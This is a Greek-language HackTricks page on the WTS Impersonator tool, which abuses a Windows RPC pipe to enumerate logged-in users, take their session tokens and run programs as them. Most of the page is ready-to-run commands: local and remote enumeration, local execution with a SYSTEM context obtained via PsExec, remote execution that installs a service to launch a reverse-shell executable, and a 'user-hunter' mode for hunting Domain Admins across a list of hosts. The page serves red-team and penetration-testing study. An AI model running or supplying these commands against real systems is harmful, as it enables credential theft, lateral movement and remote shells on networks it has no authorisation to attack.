WTS Impersonator

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Το εργαλείο WTS Impersonator εκμεταλλεύεται τον ονομασμένο αγωγό RPC "\pipe\LSM_API_service" για να απαριθμήσει αθέμιτα τους συνδεδεμένους χρήστες και να κλέψει τα διαπιστευτήριά τους, παρακάμπτοντας τις παραδοσιακές τεχνικές υποκλοπής διαπιστευτηρίων. Αυτή η προσέγγιση διευκολύνει την άθροιση κινήσεων εντός δικτύων. Η καινοτομία πίσω από αυτήν την τεχνική αποδίδεται στον Omri Baso, του οποίου το έργο είναι προσβάσιμο στο GitHub.

Βασική Λειτουργικότητα

Το εργαλείο λειτουργεί μέσω μιας ακολουθίας κλήσεων API:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Κύρια Αρθρώματα και Χρήση

  • Απαρίθμηση Χρηστών: Είναι δυνατή η τοπική και απομακρυσμένη απαρίθμηση χρηστών με το εργαλείο, χρησιμοποιώντας εντολές για κάθε περίπτωση:

  • Τοπικά:

.\WTSImpersonator.exe -m enum
  • Απομακρυσμένα, με την καθορισμένη διεύθυνση IP ή το όνομα κεντρικού υπολογιστή:

.\WTSImpersonator.exe -m enum -s 192.168.40.131
  • Εκτέλεση Εντολών: Τα αρθρώματα exec και exec-remote απαιτούν ένα πλαίσιο Υπηρεσίας για να λειτουργήσουν. Η τοπική εκτέλεση απλώς χρειάζεται το εκτελέσιμο WTSImpersonator και μια εντολή:

  • Παράδειγμα για την τοπική εκτέλεση εντολής:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
  • Το PsExec64.exe μπορεί να χρησιμοποιηθεί για την απόκτηση ενός πλαισίου υπηρεσίας:

.\PsExec64.exe -accepteula -s cmd.exe
  • Απομακρυσμένη Εκτέλεση Εντολών: Περιλαμβάνει τη δημιουργία και εγκατάσταση μιας υπηρεσίας απομακρυσμένα, παρόμοια με το PsExec.exe, επιτρέποντας την εκτέλεση με τα κατάλληλα δικαιώματα.

  • Παράδειγμα απομακρυσμένης εκτέλεσης:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
  • Αρθρώματα Κυνηγού Χρηστών: Στοχεύει συγκεκριμένους χρήστες σε πολλές μηχανές, εκτελώντας κώδικα με τα διαπιστευτήριά τους. Αυτό είναι ιδιαίτερα χρήσιμο για την επίθεση σε Διαχειριστές Τομέα με τοπικά δικαιώματα διαχειριστή σε αρκετά συστήματα.

  • Παράδειγμα χρήσης:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Last updated